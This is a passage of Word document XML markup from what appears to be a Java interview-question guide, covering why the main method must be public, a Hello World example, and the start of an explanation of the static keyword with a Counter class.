    <w:p w14:paraId="4208ED05" w14:textId="77777777" w:rsidR="00225F42" w:rsidRPr="00225F42" w:rsidRDefault="00225F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6512758"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Hello, World!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B79B9FF" w14:textId="77777777" w:rsidR="00225F42" w:rsidRPr="00225F42" w:rsidRDefault="00225F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6512758"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B946410" w14:textId="5FC175AC" w:rsidR="00225F42" w:rsidRPr="00225F42" w:rsidRDefault="00225F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6512758"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00225F42">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B748BDC" w14:textId="77777777" w:rsidR="00D00F39" w:rsidRDefault="00D00F39" w:rsidP="00713982">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589E2E90" w14:textId="4202AB5B" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0071398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will not work because the JVM cannot access the private main method, and the program will not run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B393DDB" w14:textId="77777777" w:rsidR="00D00F39" w:rsidRDefault="00D00F39" w:rsidP="00713982">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8D16A8" w14:textId="77777777" w:rsidR="00D00F39" w:rsidRDefault="00D00F39" w:rsidP="00713982">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476D383B" w14:textId="5E06EBB3" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="0071398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Correct Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C8F3A2" w14:textId="77777777" w:rsidR="00D00F39" w:rsidRPr="00D00F39" w:rsidRDefault="00D00F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838360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MyClass</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39378AD5" w14:textId="77777777" w:rsidR="00D00F39" w:rsidRPr="00D00F39" w:rsidRDefault="00D00F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838360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D5E652" w14:textId="77777777" w:rsidR="00D00F39" w:rsidRPr="00D00F39" w:rsidRDefault="00D00F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838360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Hello, World!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F1A292" w14:textId="77777777" w:rsidR="00D00F39" w:rsidRPr="00D00F39" w:rsidRDefault="00D00F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838360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C92BD44" w14:textId="03F0A550" w:rsidR="00D00F39" w:rsidRPr="00D00F39" w:rsidRDefault="00D00F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838360"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00D00F39">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D76974" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00713982">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In this example, the main method is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, allowing the JVM to access and execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E439F3" w14:textId="75BE3164"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B5562DA">
          <v:rect id="_x0000_i1178" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5556105E" w14:textId="206400F5" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="008C6F02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc196307531"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of static keywords in java</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="3E3A49BA" w14:textId="246ED37E" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">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tatic keyword in Java is used to define class-level members that belong to the class itself rather than to instances of the class (objects). It can be applied to variables, methods, blocks, and nested classes. Here's a detailed explanation of how and where the static keyword is used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2B3365" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E42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Static Variables (Class Variables)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5F86D3" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E427B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37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static variable is shared among all instances of a class. It is not tied to a specific object but belongs to the class itself. This means all objects of that class will access the same instance of the variable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C44464" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="003E42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5B278DEB" w14:textId="77777777" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Counter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177C56E0" w14:textId="77777777" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> count </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Static variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181D9570" w14:textId="77777777" w:rsidR="00CA2776" w:rsidRPr="00CA2776" w:rsidRDefault="00CA27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0621067"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2776">
        <w:rPr>
